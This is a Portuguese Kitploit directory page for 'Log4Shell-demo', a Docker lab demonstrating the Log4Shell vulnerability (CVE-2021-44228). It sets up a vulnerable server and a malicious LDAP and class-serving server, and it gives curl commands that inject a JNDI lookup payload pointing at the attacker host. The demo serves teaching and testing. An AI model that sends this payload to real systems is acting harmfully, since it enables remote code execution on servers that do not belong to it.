Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4Shell-demo — Demonstração para mostrar como a vulnerabilidade Log4Shell / CVE-2021-44228 funciona | Kitploit
Ferramentas/GitHubGitHub/mschmnet/log4shell-demo
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubmschmnet/log4shell-demo

Log4Shell-demo

Demonstração para mostrar como a vulnerabilidade Log4Shell / CVE-2021-44228 funciona

Ver Repositório
71há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Log4Shell em ação

Este projeto visa demonstrar como funciona a vulnerabilidade Log4Shell / CVE-2021-44228.

Requisitos

Você só precisa ter o Docker instalado. Idealmente, você tem duas máquinas virtuais diferentes. Uma para o servidor vulnerável e outra para o servidor malicioso que hospedará a base de código maliciosa e um servidor LDAP.

Opcionalmente, você tem Make e Docker Compose instalados, mas isso não é necessário, já que este repositório também contém um make.sh para ignorar esses requisitos e usá-los a partir de um container Docker.

Instalar Docker (opcionalmente)

Se ainda não o fez, aqui estão os passos para instalar o Docker em uma VM Debian. Você pode usar estes passos: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

Baixar o repositório

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

Instalar servidor vulnerável

root@kitploit:~
cd vulnerable-server
../make.sh run # Ou você poderia executar make run se tivesse Make e Docker Compose instalados

Iniciar servidor malicioso

Isso iniciará um servidor LDAP básico e um servidor Python básico para servir as classes Java maliciosas.

Você precisa fornecer o endereço IP ou nome de domínio onde esses servidores estarão disponíveis

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Opcionalmente make em vez de ../make.sh se você tivesse Make e Docker Compose instalados

Como atacar o servidor alvo

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

ou apenas

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

onde ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} está apenas codificado em URL

Como parar qualquer um deles

root@kitploit:~
../make.sh stop

Como exibir os logs

root@kitploit:~
../make.sh logs 

Slides

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

Baixar ferramenta